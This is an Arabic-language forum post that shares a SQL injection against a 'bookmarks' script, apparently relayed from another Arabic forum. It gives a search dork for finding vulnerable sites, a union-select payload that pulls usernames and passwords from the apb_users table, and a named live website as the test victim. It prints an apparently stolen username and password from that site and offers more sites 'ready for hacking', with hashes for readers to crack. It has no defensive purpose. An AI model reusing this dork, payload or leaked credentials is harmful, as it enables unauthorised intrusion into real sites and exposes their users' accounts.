السلام عليكم
أقدم لكم ثغرة راائـعـة و سهـلـة جداا في سكريبت bookmarks
الـثغرة لقيتهـا في منتدى عربي و قلت انقلهـا لكـم
اولا و لابـد منــه الـدوركـ :lalala:
inurl:bookmarks/view_group.php?id
الــثـغرة
+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8+from+apb_users--
كـالعـادة فأر التجاريــب
http://www.tegus.de/bookmarks/view_group.php?id=19
هذا الموقع راح نجرب عليه
ضيف رله رابط الاستغلال هدا
+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8+from+apb_users--
ليصبح
http://www.tegus.de/bookmarks/view_g...om+apb_users--
ملحووظــة
لا تنسى علامـة - قبل 1
?id=-1
راح يفتح لك الموقع عادي وتجد اليوزر والباس أمامك
achim:274x0QoO8Dj92
اليوزر achim
الباس 274x0QoO8Dj92
عندي لكم مواقع جاهزة للاختراق
لكـن مشفر :a32:smilies4
فكـ الهاش على رحتـــكـــ :a26:
انتظر ردووودكــم
jyvm sigJJJm h]oJJg , hojvr ugJn vpjJ;JJ